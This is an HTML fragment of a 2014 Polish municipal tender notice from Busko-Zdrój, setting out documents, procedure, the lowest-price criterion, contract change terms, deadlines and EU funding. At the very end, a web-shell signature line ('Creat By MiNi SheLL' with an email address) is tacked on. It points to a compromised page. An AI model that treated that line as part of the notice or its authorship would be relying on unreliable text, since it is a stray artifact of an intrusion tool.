</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć:
1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy
1.	Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności. 
2.	Zmiana postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadku:  wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy (termin, zakres, wartość Umowy). 
3.	Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadkach, gdy: 
a)    opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. siła wyższa (np.: klęska żywiołowa, niesprzyjające warunki atmosferyczne). Termin ten zostaje wówczas przedłużony o czas trwania zaistniałych okoliczności - do czasu ustąpienia tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com